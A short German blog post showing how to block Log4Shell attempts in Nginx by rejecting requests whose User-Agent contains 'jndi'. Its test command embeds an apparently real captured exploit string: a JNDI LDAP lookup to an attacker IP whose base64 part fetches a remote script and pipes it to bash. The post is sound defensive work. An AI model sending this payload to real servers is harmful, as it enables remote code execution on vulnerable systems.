---
title: "log4j Exploit via Nginx verhindern"
date: 2021-12-10T16:30:00+01:00
draft: false
description: "Wie man den log4j exploit über den User-Agent String mit Nginx verhindert"
featured: false
categories: [
  "IT"
]
tags: [
    "Nginx",
    "Log4J",
]
images: [
]
---

Ich möchte euch in diesem kurzen Blogpost eine Möglichkeit zeigen, den aktuell kursierenden Exploit zu verhindern.  
Dies funktioniert nur, solange die Angreifer sich auf den User-Agent beschränken, sollten andere Felder benutzt werden, wird diese Methode nicht mehr funktionieren.

Wir werden dies dadurch realisieren, dass wir User-Agents die ein `jndi` beinhalten abweisen.  
Hierfür benötigen wir eine Datei, die unsere User-Agents, enthält.
Ich lege diese immer als `/etc/nginx/useragent.rules` an.  

Sie hat für diesen Fall folgenden Inhalt:  

```nginx 
map $http_user_agent $agent2block {
        default         0;
        ~*jndi          1;
}
```

Der `default` Parameter besagt mit der `0`, dass wir generell alles zulassen, dass wir nicht verbieten wollen.

Direkt darunter ist der Eintrag für den Exploit, hier steht eine `1`, dadurch legen wir fest, dass sobald es hier einen Treffer gibt der Zugriff auf die Seite verwehrt wird.  

Als nächstes müssen wir die `useragent.rules` in unsere `nginx.conf` integrieren, das machen wir wie folgend:  

```nginx 
include             /etc/nginx/mime.types;
default_type        application/octet-stream;
include             /etc/nginx/useragent.rules;
```

Im letzten Schritt müssen wir noch unsere `Virtual Hosts` anpassen. Jeder einzelne benötigt foldenden Eintrag, dieser muss **vor dem ersten Location Block** kommen, da er sonst nicht richtig greif.

```nginx
if ($agent2block = 1) {
  return 403;
}
```
Wenn wir jetzt unseren Nginx neu starten, können wir mit folgendem Befehl testen, ob die Änderungen funktionieren:

```bash
wget --user-agent '${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNzYuOS42MC4yNTA6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE3Ni45LjYwLjI1MDo0NDMpfGJhc2g=}' https://<vhost_url>

HTTP request sent, awaiting response... 403 Forbidden
2021-12-10 16:17:37 ERROR 403: Forbidden.
```

Damit ist man vor der ersten Angriffswelle gesichert. Sobald die verbesserten Angriffe kommen, wird dies nicht mehr reichen.  Im nächsten Blogpost werde ich euch anhand von Jitsi erklären, wie ihr die betroffene Funktion in log4j ausschalten könnt.